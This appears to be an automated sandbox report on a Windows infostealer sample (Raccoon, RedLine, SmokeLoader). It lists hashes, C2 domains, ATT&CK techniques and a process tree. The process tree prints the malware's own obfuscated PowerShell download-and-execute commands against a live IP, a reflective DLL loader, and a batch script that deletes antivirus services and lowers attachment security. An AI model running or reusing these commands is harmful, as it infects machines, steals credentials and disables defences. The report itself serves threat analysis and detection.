raccoon | 776124547155ae68a2dac2b106f6aa8d39b2e71a3b11ca6241a7e305fa03605a

Analysis

max time kernel
150s
max time network
158s
platform
windows10_x64
resource
win10v20210408
submitted
13-08-2021 06:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3da56853cea772e7f90f92c66d8c0a31.exe
Size

320KB
MD5

3da56853cea772e7f90f92c66d8c0a31
SHA1

45a659f9006fb9703a1fef5fc9044a84788228ef
SHA256

776124547155ae68a2dac2b106f6aa8d39b2e71a3b11ca6241a7e305fa03605a
SHA512

0003c3fb6dab98f79f0fda8bd33140e9c35fc37ea4407dfdc930170f227d9209adbbbfeb96b9a41fc3ed5cfe44d716a74ff21222ec18e598db9de92a6d5ad9c8

Score

10^/10

raccoon redline smokeloader 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor discovery evasion infostealer persistence spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/208-181-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/208-182-0x000000000044003F-mapping.dmp	family_raccoon
behavioral2/memory/208-184-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/1640-220-0x00000000048A0000-0x0000000004931000-memory.dmp	family_raccoon
behavioral2/memory/1640-223-0x0000000000400000-0x0000000002CA9000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 3628 created 1640 3628 WerFault.exe 936B.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

204 680 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

2EF0.exe3153.exe3403.exe3B96.exeRuntimebroker.exe3403.exe936B.exe

pid process

208 2EF0.exe
2972 3153.exe
3476 3403.exe
2100 3B96.exe
1396 Runtimebroker.exe
208 3403.exe
1640 936B.exe

description	pid	process	target process
PID 3628 created 1640	3628	WerFault.exe	936B.exe

flow	pid	process
204	680	powershell.exe

pid	process
208	2EF0.exe
2972	3153.exe
3476	3403.exe
2100	3B96.exe
1396	Runtimebroker.exe
208	3403.exe
1640	936B.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3B96.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3B96.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3B96.exe

Deletes itself 1 IoCs

Processes:

pid process

3016

pid	process
3016

Drops startup file 3 IoCs

Processes:

cmd.exeRuntimebroker.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe

Loads dropped DLL 1 IoCs

Processes:

3403.exe

pid process

208 3403.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
208	3403.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3B96.exe	themida
C:\Users\Admin\AppData\Local\Temp\3B96.exe	themida
behavioral2/memory/2100-142-0x0000000000210000-0x0000000000211000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

3B96.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3B96.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

3B96.exe

pid process

2100 3B96.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3B96.exe

pid	process
2100	3B96.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

3da56853cea772e7f90f92c66d8c0a31.exe3403.exe

description	pid	process	target process
PID 3128 set thread context of 1872	3128	3da56853cea772e7f90f92c66d8c0a31.exe	3da56853cea772e7f90f92c66d8c0a31.exe
PID 3476 set thread context of 208	3476	3403.exe	3403.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4076	208	WerFault.exe	2EF0.exe
1312	208	WerFault.exe	2EF0.exe
772	208	WerFault.exe	2EF0.exe
1856	208	WerFault.exe	2EF0.exe
2272	208	WerFault.exe	2EF0.exe
1240	208	WerFault.exe	2EF0.exe
632	1396	WerFault.exe	Runtimebroker.exe
1436	1396	WerFault.exe	Runtimebroker.exe
1920	1396	WerFault.exe	Runtimebroker.exe
1164	1396	WerFault.exe	Runtimebroker.exe
2056	1396	WerFault.exe	Runtimebroker.exe
3644	1396	WerFault.exe	Runtimebroker.exe
1920	208	WerFault.exe	3403.exe
2152	1640	WerFault.exe	936B.exe
3000	1640	WerFault.exe	936B.exe
2416	1640	WerFault.exe	936B.exe
4084	1640	WerFault.exe	936B.exe
3628	1640	WerFault.exe	936B.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

3da56853cea772e7f90f92c66d8c0a31.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3da56853cea772e7f90f92c66d8c0a31.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3da56853cea772e7f90f92c66d8c0a31.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3da56853cea772e7f90f92c66d8c0a31.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

3da56853cea772e7f90f92c66d8c0a31.exe

pid	process
1872	3da56853cea772e7f90f92c66d8c0a31.exe
1872	3da56853cea772e7f90f92c66d8c0a31.exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3016
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

3da56853cea772e7f90f92c66d8c0a31.exe

pid process

1872 3da56853cea772e7f90f92c66d8c0a31.exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016

pid	process
3016

Suspicious use of AdjustPrivilegeToken 55 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe3B96.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exe3403.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	4076	WerFault.exe
Token: SeBackupPrivilege	4076	WerFault.exe
Token: SeDebugPrivilege	4076	WerFault.exe
Token: SeDebugPrivilege	1312	WerFault.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	772	WerFault.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	1856	WerFault.exe
Token: SeDebugPrivilege	2272	WerFault.exe
Token: SeDebugPrivilege	1240	WerFault.exe
Token: SeDebugPrivilege	2100	3B96.exe
Token: SeDebugPrivilege	632	WerFault.exe
Token: SeDebugPrivilege	1436	WerFault.exe
Token: SeDebugPrivilege	1920	WerFault.exe
Token: SeDebugPrivilege	1164	WerFault.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	2056	WerFault.exe
Token: SeDebugPrivilege	3644	WerFault.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	3476	3403.exe
Token: SeDebugPrivilege	1920	WerFault.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	680	powershell.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	2152	WerFault.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	3000	WerFault.exe
Token: SeDebugPrivilege	2416	WerFault.exe
Token: SeDebugPrivilege	4084	WerFault.exe
Token: SeDebugPrivilege	3628	WerFault.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

3016
3016
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

pid process

3016
3016
3016
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3016

pid	process
3016
3016

pid	process
3016
3016
3016

pid	process
3016

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3da56853cea772e7f90f92c66d8c0a31.exe2EF0.exe3153.exeRuntimebroker.exe3403.exepowershell.exe

description	pid	process	target process
PID 3128 wrote to memory of 1872	3128	3da56853cea772e7f90f92c66d8c0a31.exe	3da56853cea772e7f90f92c66d8c0a31.exe
PID 3128 wrote to memory of 1872	3128	3da56853cea772e7f90f92c66d8c0a31.exe	3da56853cea772e7f90f92c66d8c0a31.exe
PID 3128 wrote to memory of 1872	3128	3da56853cea772e7f90f92c66d8c0a31.exe	3da56853cea772e7f90f92c66d8c0a31.exe
PID 3128 wrote to memory of 1872	3128	3da56853cea772e7f90f92c66d8c0a31.exe	3da56853cea772e7f90f92c66d8c0a31.exe
PID 3128 wrote to memory of 1872	3128	3da56853cea772e7f90f92c66d8c0a31.exe	3da56853cea772e7f90f92c66d8c0a31.exe
PID 3128 wrote to memory of 1872	3128	3da56853cea772e7f90f92c66d8c0a31.exe	3da56853cea772e7f90f92c66d8c0a31.exe
PID 3016 wrote to memory of 208	3016		2EF0.exe
PID 3016 wrote to memory of 208	3016		2EF0.exe
PID 3016 wrote to memory of 208	3016		2EF0.exe
PID 3016 wrote to memory of 2972	3016		3153.exe
PID 3016 wrote to memory of 2972	3016		3153.exe
PID 3016 wrote to memory of 2972	3016		3153.exe
PID 3016 wrote to memory of 3476	3016		3403.exe
PID 3016 wrote to memory of 3476	3016		3403.exe
PID 3016 wrote to memory of 3476	3016		3403.exe
PID 3016 wrote to memory of 2100	3016		3B96.exe
PID 3016 wrote to memory of 2100	3016		3B96.exe
PID 3016 wrote to memory of 2100	3016		3B96.exe
PID 208 wrote to memory of 1396	208	2EF0.exe	Runtimebroker.exe
PID 208 wrote to memory of 1396	208	2EF0.exe	Runtimebroker.exe
PID 208 wrote to memory of 1396	208	2EF0.exe	Runtimebroker.exe
PID 2972 wrote to memory of 668	2972	3153.exe	cmd.exe
PID 2972 wrote to memory of 668	2972	3153.exe	cmd.exe
PID 2972 wrote to memory of 668	2972	3153.exe	cmd.exe
PID 1396 wrote to memory of 1320	1396	Runtimebroker.exe	powershell.exe
PID 1396 wrote to memory of 1320	1396	Runtimebroker.exe	powershell.exe
PID 1396 wrote to memory of 1320	1396	Runtimebroker.exe	powershell.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3476 wrote to memory of 208	3476	3403.exe	3403.exe
PID 3016 wrote to memory of 1640	3016		936B.exe
PID 3016 wrote to memory of 1640	3016		936B.exe
PID 3016 wrote to memory of 1640	3016		936B.exe
PID 3016 wrote to memory of 1924	3016		explorer.exe
PID 3016 wrote to memory of 1924	3016		explorer.exe
PID 3016 wrote to memory of 1924	3016		explorer.exe
PID 3016 wrote to memory of 1924	3016		explorer.exe
PID 1396 wrote to memory of 680	1396	Runtimebroker.exe	powershell.exe
PID 1396 wrote to memory of 680	1396	Runtimebroker.exe	powershell.exe
PID 1396 wrote to memory of 680	1396	Runtimebroker.exe	powershell.exe
PID 3016 wrote to memory of 196	3016		explorer.exe
PID 3016 wrote to memory of 196	3016		explorer.exe
PID 3016 wrote to memory of 196	3016		explorer.exe
PID 3016 wrote to memory of 3464	3016		explorer.exe
PID 3016 wrote to memory of 3464	3016		explorer.exe
PID 3016 wrote to memory of 3464	3016		explorer.exe
PID 3016 wrote to memory of 3464	3016		explorer.exe
PID 3016 wrote to memory of 1320	3016		explorer.exe
PID 3016 wrote to memory of 1320	3016		explorer.exe
PID 3016 wrote to memory of 1320	3016		explorer.exe
PID 3016 wrote to memory of 3008	3016		explorer.exe
PID 3016 wrote to memory of 3008	3016		explorer.exe
PID 3016 wrote to memory of 3008	3016		explorer.exe
PID 3016 wrote to memory of 3008	3016		explorer.exe
PID 680 wrote to memory of 1924	680	powershell.exe	powershell.exe
PID 680 wrote to memory of 1924	680	powershell.exe	powershell.exe
PID 680 wrote to memory of 1924	680	powershell.exe	powershell.exe
PID 3016 wrote to memory of 2432	3016		explorer.exe

C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe
"C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3128

C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe
"C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1872

C:\Users\Admin\AppData\Local\Temp\2EF0.exe
C:\Users\Admin\AppData\Local\Temp\2EF0.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 788
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 868
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 836
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 912
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 848
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 924
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 732
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 784
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 764
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 784
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 976
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1008
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d 